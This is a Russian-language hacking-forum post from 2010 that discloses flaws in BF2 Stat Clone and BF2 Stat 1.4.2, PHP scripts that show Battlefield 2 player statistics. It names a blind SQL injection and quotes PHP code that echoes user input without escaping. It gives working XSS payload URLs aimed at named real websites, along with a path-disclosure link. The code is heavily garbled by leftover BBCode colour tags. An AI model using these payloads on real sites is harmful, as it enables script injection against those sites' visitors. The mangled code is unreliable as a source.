12.08.2010, 23:04
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
BF2 Stat Clone
Скачать: http://upload.com.ua/get/901846173/
Blind SQL Injection:
[QUOTE="None"]
\queries\getPID.php
[PHP]
PHP:
[COLOR="#000000"][COLOR="#007700"]
BF2 Stat 1.4.2
XSS
search.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'search_pid'[/COLOR][COLOR="#007700"]] ) {
echo[/COLOR][COLOR="#DD0000"]'Find Player: "'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'search_pid'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#DD0000"]'"'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$players[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$stats[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]findPlayer[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'search_pid'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'searchAt'[/COLOR][COLOR="#007700"]]);
if([/COLOR][COLOR="#0000BB"]$players[/COLOR][COLOR="#007700"]) {
echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
foreach([/COLOR][COLOR="#0000BB"]$players[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]) echo[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]nick[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]"Not finding your nick? Try to get more specific.
The BF2 stat servers only return 100 matches in a set.
Also, players with a score of 0 are exlcuded."[/COLOR][COLOR="#007700"];
....[/COLOR][/COLOR]
Вписываем, Найти Игрока
По ID: ">alert(010010010)
Result: [Пример одного сайта]
Сообщение от None
http://bf2.vault.ua/stats/player.php?pid=">alert(010010010)
Autor Website:
http://www.brainpecker.com/
Раскрытие Пути:
Сообщение от None
http://www.brainpecker.com/bf2_stats_query.php?input1=1111
:
В Поле " Nick or PID 1": alert('xss')
bf2_stats_tables.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]additionalSearchResults[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$search_result[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$nick[/COLOR][COLOR="#007700"]) {
if([/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$search_result[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#FF8000"]// format output
[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$max[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$search_result[/COLOR][COLOR="#007700"]);
for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$search_result[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]"nick"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]++;
}
}
....[/COLOR][/COLOR]
Result:
Сообщение от None
http://www.brainpecker.com/bf2_stats_query.php?input1=">alert('xss')
|
|
|